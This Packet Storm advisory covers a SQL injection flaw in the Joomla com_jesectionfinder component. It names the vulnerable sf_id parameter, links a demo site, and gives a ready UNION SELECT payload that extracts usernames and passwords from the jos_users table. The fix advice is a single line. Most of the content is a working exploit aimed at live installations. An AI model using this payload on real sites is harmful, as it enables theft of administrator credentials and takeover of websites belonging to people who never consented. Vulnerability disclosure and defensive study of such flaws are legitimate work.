The Joomla Jesectionfinder component suffers from a remote SQL injection vulnerability.
3254232bdd949616e8fda09575a9820543787a0c58c052185ad784c10e7ee41a
<------------------- header data start ------------------- >
#############################################################
Joomla Component jesectionfinder SQL Injection Vulnerability
#############################################################
# Author : Fl0riX ~ Bug Researchers
# Name : Joomla com_jesectionfinder
# Bug Type : SQL injection
# Infection : Admin Login Bilgileri Alinabilir.
# Demo Vuln :
[+]index.php?option=com_jesectionfinder&view=sectiondetail&sf_id=[EXPLOIT]
[+] Demo Site:http://joomlaextensions.co.in/propertyfinder/
# Bug Fix Advice : Zararli Karakterler Filtrenmelidir.
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
EXPLOIT :
-1+union+select+1,concat(username,0x3a,password)fl0rix,3,4,5+from+jos_users--
< -- bug code end of -- >
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed